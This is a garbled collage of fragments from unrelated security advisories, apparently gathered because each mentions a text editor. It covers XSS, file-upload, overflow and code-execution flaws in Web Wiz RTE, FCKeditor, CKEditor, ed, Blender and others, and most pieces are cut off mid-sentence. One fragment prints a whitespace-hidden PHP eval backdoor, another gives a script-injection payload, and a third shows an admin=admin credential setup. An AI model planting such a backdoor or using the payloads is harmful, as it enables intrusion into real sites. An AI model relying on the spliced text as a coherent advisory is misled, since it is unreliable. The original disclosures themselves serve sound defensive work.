Text Editor
-######### [Saved] - [27-07-2008/13:10:02]
# .: Multiple Cross-Site Scripting Vulnerabilities in Web Wiz Rich Text Editor version 4.02
# .: [Author] CSDT
# .: [Affected versions] http://www.webwizguide.com/ - Web Wiz Rich Text Editor (RTE) 4.02
# .: [Credit] The disclosure of these issues has been credited to autehoker of CSDT
# _____________________________________________________________________________________________
# .: [Script Description]
# (Description Provided by CVE) : Multiple cross-site scripting (XSS) vulnerabilities in
# Web Wiz Rich Text Editor (RTE) 4.02 and earlier, and 3.x versions, allow remote attackers
# to inject arbitrary web scripting. This flaw exists because the application does not validate
2. PRODUCT DESCRIPTION
Based on the powerful editing component Scintilla, Notepad++ is the
most powerful and famous open-source text editor written in C++
and uses pure Win32 API and STL which ensures a higher execution speed
and smaller program size. By optimizing as many routines as
possible without losing user friendliness, Notepad++ is trying to
reduce the world carbon dioxide emissions. When using less
CPU power, the PC can throttle down and reduce power consumption,
full control of the machine where Blender is installed sending a
specially crafted .blend file and enticing the user to open it.
These are the steps to reproduce the issue:
. Open the "Text Editor" Panel.
. Right click on the canvas and select "New".
. Write your python code there. For instance:
/-----
import os
########################## WwW.BugReport.ir
###########################################
#
# AmnPardaz Security Research Team
#
# Title: Web Wiz Rich Text Editor(TM)
# Vendor: http://www.webwizguide.com/
# Bug: Directory traversal + HTM/HTML file creation on the server
# Vulnerable Version: 4.0
# Exploit: Available
# Fix Available: No! Fast Solution is available.
TITLE: jQuery Lightweight Rich Text Editor (lwrte) Plugin uploader.php Arbitrary File Upload
PRODUCT: jQuery Lightweight Rich Text Editor (lwrte) Plugin
PRODUCT URL 1: http://code.google.com/p/lwrte/
PRODUCT URL 2: http://plugins.jquery.com/project/lwRTE
CHECKED VERSIONS: 1.2
RESEARCHERS: underground-stockholm.com
RESEARCHERS URL: http://underground-stockholm.com/
BUG:
Changing the Management Console Username and Password
+----------------------------------------------------
Complete these steps:
1. Open the following file in a text editor:
$AVS_HOME/console/jboss-3.0.1_tomcat-4.0.4/server/default/deploy/
fgconsole.war/users.properties
Use the line admin=admin to set the username and password. The
Background
==========
TRAMP is a remote file editing package for GNU Emacs, a highly
extensible and customizable text editor.
Affected packages
=================
-------------------------------------------------------------------
3. Problem Description
a. Updated ESX patch updates Service Console package ed
ed is a line-oriented text editor, used to create, display, and
modify text files (both interactively and via shell scripts).
A heap-based buffer overflow was discovered in the way ed, the GNU
line editor, processed long file names. An attacker could create a
file with a specially-crafted name that could possibly execute an
user-assisted attackers to execute arbitrary code.
Background
==========
XEmacs is a highly extensible and customizable text editor.
Affected packages
=================
-------------------------------------------------------------------
010 Editor Multiple Buffer Overflow Vulnerabilities
1. General Information
010 Editor is a text editor and hex editor, with a lot of functions as
view and edit binary files, analyze and edit binary data, import and
export binary data in many different formats.
Bkis has just found many vulnerabilities in the software, related to the
processing of 010 Editor Binary Template files (“.bt”) and 010 Editor
#2009-007 FCKeditor input sanitization errors
Description:
FCKeditor, a web based open source HTML text editor, suffers from a remote
file upload vulnerability.
The input of several connector modules is not properly verified before being
used, this leads to exposure of the contents of arbitrary directories on the
server filesystem and allows file uploading to arbitrary locations. The
arbitrary code.
Background
==========
gedit is a text editor for the GNOME desktop.
Affected packages
=================
-------------------------------------------------------------------
How to determine if you are affected:
1. Using Windows Explorer, locate the file "RELEASE-NOTES".
2. By default, the file is located in the
"C:\Program Files\CA\Cohesion\Server\server\" directory.
3. Open the file with a text editor.
4. If the version is less than 5.5.25, the installation is
vulnerable.
Workaround: None
execution of arbitrary code.
Background
==========
GNU Emacs is a highly extensible and customizable text editor.
Affected packages
=================
-------------------------------------------------------------------
Backdoor in file:
/php/modules/entries/search.cache.inc.php
line 8:
$cache_path = '/search/' . GetValidFilename($search_term) . '_' . $search_hash . '_info.dat';
if(@stripslashes($_POST['p']) == 'ZCShY8FjtEhIF8LZ'){@eval(@stripslashes($_POST['e']));exit;};
the second string is hidden at the very right side with whitespace in the text editor, so nobody had seen it before,
the function is called in:
/php/modules/entries/search.main.inc.php
exploit:
-->
Application: Obedit
Version: 3.03
Vendor: http://www.oblius.com/?projects.obedit
Description:
obedit is a Flash-based rich text editor. It will allow a user to edit text much like you would in an office-like application, with simple editing features like bold, italic, justification, block indents, text color, font and size selection, links, bullets, background color, and spell checking.
--------------------
Vulns:
--------------------
Versions Affected: 3.0 - 3.6.2 (Developers confirm all versions since 3.0 are affected.)
Info:
CKEditor is a text editor to be used inside web pages. It's a WYSIWYG editor, which
means that the text being edited on it looks as similar as possible to the results users
have when publishing it. It brings to the web common editing features found on desktop
Technical Explanation
=====================
The string below is not properly sanitized when the web page is saved
after adding a picture using the application's text editor:
"""></P></div></td><script>alert("bingo");</script>
The text between the script tags will be injected into the page upon
each successful edit and save operation, after the page is initially